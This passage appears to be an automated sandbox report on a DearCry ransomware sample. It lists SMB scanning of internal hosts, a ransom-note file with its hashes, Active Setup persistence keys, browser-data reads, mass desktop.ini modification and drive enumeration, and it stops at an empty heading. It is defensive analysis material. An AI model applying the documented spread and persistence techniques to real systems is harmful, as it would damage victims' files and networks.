N/A 10.127.0.230:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.255.2:445 tcp
N/A 10.127.255.14:445 tcp
N/A 10.127.255.28:445 tcp
N/A 10.127.255.24:445 tcp
N/A 10.127.255.30:445 tcp
N/A 10.127.255.9:445 tcp
N/A 10.127.255.64:445 tcp
N/A 10.127.255.46:445 tcp
N/A 10.127.255.53:445 tcp
N/A 10.127.255.35:445 tcp
N/A 10.127.255.41:445 tcp
N/A 10.127.255.50:445 tcp
N/A 10.127.255.51:445 tcp
N/A 10.127.255.34:445 tcp
N/A 10.127.255.18:445 tcp
N/A 10.127.255.20:445 tcp
N/A 10.127.255.27:445 tcp
N/A 10.127.255.58:445 tcp
N/A 10.127.255.12:445 tcp
N/A 10.127.255.37:445 tcp
N/A 10.127.255.44:445 tcp
N/A 10.127.255.63:445 tcp
N/A 10.127.255.43:445 tcp
N/A 10.127.255.57:445 tcp
N/A 10.127.255.55:445 tcp
N/A 10.127.255.8:445 tcp
N/A 10.127.255.59:445 tcp
N/A 10.127.255.21:445 tcp
N/A 10.127.255.11:445 tcp
N/A 10.127.255.60:445 tcp
N/A 10.127.255.40:445 tcp
N/A 10.127.255.25:445 tcp
N/A 10.127.255.31:445 tcp
N/A 10.127.255.61:445 tcp
N/A 10.127.255.1:445 tcp
N/A 10.127.255.49:445 tcp
N/A 10.127.255.54:445 tcp
N/A 10.127.255.29:445 tcp
N/A 10.127.255.32:445 tcp
N/A 10.127.255.10:445 tcp
N/A 10.127.255.4:445 tcp
N/A 10.127.255.5:445 tcp
N/A 10.127.255.6:445 tcp
N/A 10.127.255.22:445 tcp
N/A 10.127.255.238:445 tcp
N/A 10.127.255.0:445 tcp
N/A 10.127.255.42:445 tcp
N/A 10.127.255.65:445 tcp
N/A 10.127.255.47:445 tcp
N/A 10.127.255.17:445 tcp
N/A 10.127.255.56:445 tcp
N/A 10.127.255.3:445 tcp
N/A 10.127.255.26:445 tcp
N/A 10.127.255.39:445 tcp
N/A 10.127.255.38:445 tcp
N/A 10.127.255.16:445 tcp
N/A 10.127.255.33:445 tcp
N/A 10.127.255.52:445 tcp
N/A 10.127.255.62:445 tcp
N/A 10.127.255.23:445 tcp
N/A 10.127.255.15:445 tcp
N/A 10.127.255.13:445 tcp
N/A 10.127.255.48:445 tcp
N/A 10.127.255.7:445 tcp
N/A 10.127.255.19:445 tcp
N/A 10.127.255.45:445 tcp
N/A 10.127.255.36:445 tcp
N/A 10.127.255.237:445 tcp
N/A 10.127.255.124:445 tcp
N/A 10.127.255.103:445 tcp
N/A 10.127.255.122:445 tcp
N/A 10.127.255.72:445 tcp
N/A 10.127.255.98:445 tcp
N/A 10.127.255.69:445 tcp
N/A 10.127.255.82:445 tcp
N/A 10.127.255.79:445 tcp
N/A 10.127.255.192:445 tcp
N/A 10.127.255.73:445 tcp
N/A 10.127.255.109:445 tcp
N/A 10.127.255.96:445 tcp
N/A 10.127.255.68:445 tcp
N/A 10.127.255.107:445 tcp
N/A 10.127.255.80:445 tcp
N/A 10.127.255.99:445 tcp
N/A 10.127.255.70:445 tcp
N/A 10.127.255.123:445 tcp
N/A 10.127.255.104:445 tcp
N/A 10.127.255.120:445 tcp
N/A 10.127.255.111:445 tcp
N/A 10.127.255.77:445 tcp
N/A 10.127.255.102:445 tcp
N/A 10.127.255.81:445 tcp
N/A 10.127.255.112:445 tcp
N/A 10.127.255.91:445 tcp
N/A 10.127.255.97:445 tcp
N/A 10.127.255.105:445 tcp
N/A 10.127.255.113:445 tcp
N/A 10.127.255.100:445 tcp
N/A 10.127.255.95:445 tcp
N/A 10.127.255.125:445 tcp
N/A 10.127.255.71:445 tcp
N/A 10.127.255.128:445 tcp
N/A 10.127.255.78:445 tcp
N/A 10.127.255.89:445 tcp
N/A 10.127.255.121:445 tcp
N/A 10.127.255.90:445 tcp
N/A 10.127.255.75:445 tcp
N/A 10.127.255.108:445 tcp
N/A 10.127.255.126:445 tcp
N/A 10.127.255.83:445 tcp
N/A 10.127.255.127:445 tcp
N/A 10.127.255.88:445 tcp
N/A 10.127.255.106:445 tcp
N/A 10.127.255.129:445 tcp
N/A 10.127.255.132:445 tcp
N/A 10.127.255.157:445 tcp
N/A 10.127.255.174:445 tcp
N/A 10.127.255.141:445 tcp
N/A 10.127.255.171:445 tcp
N/A 10.127.255.139:445 tcp
N/A 10.127.255.156:445 tcp
N/A 10.127.255.164:445 tcp
N/A 10.127.255.148:445 tcp
N/A 10.127.255.147:445 tcp
N/A 10.127.255.166:445 tcp
N/A 10.127.255.173:445 tcp
N/A 10.127.255.86:445 tcp
N/A 10.127.255.138:445 tcp
N/A 10.127.255.163:445 tcp
N/A 10.127.255.155:445 tcp
N/A 10.127.255.67:445 tcp
N/A 10.127.255.135:445 tcp
N/A 10.127.255.160:445 tcp
N/A 10.127.255.101:445 tcp
N/A 10.127.255.114:445 tcp
N/A 10.127.255.161:445 tcp
N/A 10.127.255.115:445 tcp
N/A 10.127.255.241:445 tcp
N/A 10.127.255.151:445 tcp
N/A 10.127.255.170:445 tcp
N/A 10.127.255.242:445 tcp
N/A 10.127.255.74:445 tcp
N/A 10.127.255.162:445 tcp
N/A 10.127.255.93:445 tcp
N/A 10.127.255.146:445 tcp
N/A 10.127.255.130:445 tcp
N/A 10.127.255.149:445 tcp
N/A 10.127.255.118:445 tcp
N/A 10.127.255.110:445 tcp
N/A 10.127.255.143:445 tcp
N/A 10.127.255.134:445 tcp
N/A 10.127.255.145:445 tcp
N/A 10.127.255.243:445 tcp
N/A 10.127.255.94:445 tcp
N/A 10.127.255.87:445 tcp
N/A 10.127.255.131:445 tcp
N/A 10.127.255.152:445 tcp
N/A 10.127.255.159:445 tcp
N/A 10.127.255.144:445 tcp
N/A 10.127.255.168:445 tcp
N/A 10.127.255.76:445 tcp
N/A 10.127.255.142:445 tcp
N/A 10.127.255.140:445 tcp
N/A 10.127.255.169:445 tcp
N/A 10.127.255.165:445 tcp
N/A 10.127.255.119:445 tcp
N/A 10.127.255.153:445 tcp
N/A 10.127.255.92:445 tcp
N/A 10.127.255.172:445 tcp
N/A 10.127.255.137:445 tcp
N/A 10.127.255.85:445 tcp
N/A 10.127.255.116:445 tcp
N/A 10.127.255.154:445 tcp
N/A 10.127.255.136:445 tcp
N/A 10.127.255.66:445 tcp
N/A 10.127.255.117:445 tcp
N/A 10.127.255.133:445 tcp
N/A 10.127.255.150:445 tcp
N/A 10.127.255.84:445 tcp
N/A 10.127.255.158:445 tcp
N/A 10.127.255.167:445 tcp
N/A 10.127.255.220:445 tcp
N/A 10.127.255.194:445 tcp
N/A 10.127.255.215:445 tcp
N/A 10.127.255.247:445 tcp
N/A 10.127.255.184:445 tcp
N/A 10.127.255.198:445 tcp
N/A 10.127.255.230:445 tcp
N/A 10.127.255.212:445 tcp
N/A 10.127.255.183:445 tcp
N/A 10.127.255.213:445 tcp
N/A 10.127.255.197:445 tcp
N/A 10.127.255.216:445 tcp
N/A 10.127.255.219:445 tcp
N/A 10.127.255.221:445 tcp
N/A 10.127.255.205:445 tcp
N/A 10.127.255.210:445 tcp
N/A 10.127.255.229:445 tcp
N/A 10.127.255.178:445 tcp
N/A 10.127.255.204:445 tcp
N/A 10.127.255.231:445 tcp
N/A 10.127.255.228:445 tcp
N/A 10.127.255.188:445 tcp
N/A 10.127.255.244:445 tcp
N/A 10.127.255.211:445 tcp
N/A 10.127.255.233:445 tcp
N/A 10.127.255.177:445 tcp
N/A 10.127.255.207:445 tcp
N/A 10.127.255.232:445 tcp
N/A 10.127.255.195:445 tcp
N/A 10.127.255.224:445 tcp
N/A 10.127.255.199:445 tcp
N/A 10.127.255.186:445 tcp
N/A 10.127.255.181:445 tcp
N/A 10.127.255.218:445 tcp
N/A 10.127.255.254:445 tcp
N/A 10.127.255.223:445 tcp
N/A 10.127.255.176:445 tcp
N/A 10.127.255.187:445 tcp
N/A 10.127.255.246:445 tcp
N/A 10.127.255.217:445 tcp
N/A 10.127.255.226:445 tcp
N/A 10.127.255.253:445 tcp
N/A 10.127.255.193:445 tcp
N/A 10.127.255.202:445 tcp
N/A 10.127.255.191:445 tcp
N/A 10.127.255.203:445 tcp
N/A 10.127.255.227:445 tcp
N/A 10.127.255.225:445 tcp
N/A 10.127.255.222:445 tcp
N/A 10.127.255.189:445 tcp
N/A 10.127.255.248:445 tcp
N/A 10.127.255.175:445 tcp
N/A 10.127.255.208:445 tcp
N/A 10.127.255.196:445 tcp
N/A 10.127.255.251:445 tcp
N/A 10.127.255.214:445 tcp
N/A 10.127.255.235:445 tcp
N/A 10.127.255.200:445 tcp
N/A 10.127.255.180:445 tcp
N/A 10.127.255.245:445 tcp
N/A 10.127.255.201:445 tcp
N/A 10.127.255.185:445 tcp
N/A 10.127.255.240:445 tcp
N/A 10.127.255.190:445 tcp
N/A 10.127.255.209:445 tcp
N/A 10.127.255.206:445 tcp
N/A 10.127.255.179:445 tcp
N/A 10.127.255.182:445 tcp
N/A 10.127.255.234:445 tcp
N/A 10.127.255.249:445 tcp
N/A 10.127.255.239:445 tcp
N/A 10.127.255.252:445 tcp
N/A 10.127.255.250:445 tcp
N/A 10.127.255.236:445 tcp

Files

C:\Program Files (x86)\R3ADM3.txt

MD5 e6f001fc98cb51a0429ca5dc95f6a950
SHA1 16a73b95d0b5408fa95c97bc9f314f1eff4902b4
SHA256 acf1bb83790c25806dd3c29e0b453002397c7fe7abc25a3470ae4e3164f9f31b
SHA512 11e65ed0e80aedb497ab40edf5d3f756b121527cb1102408cdd9f146549c849a41a16fc908bb284c920b061c6b37723117b929de150a62cd61273c40e660168c

Analysis: behavioral24

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:39

Platform

win10v2004-20240704-en

Max time kernel

280s

Max time network

1813s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

Signatures

DearCry

ransomware dearcry

Renames multiple (7382) files with added filename extension

ransomware

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Windows\explorer.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini C:\Windows\explorer.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
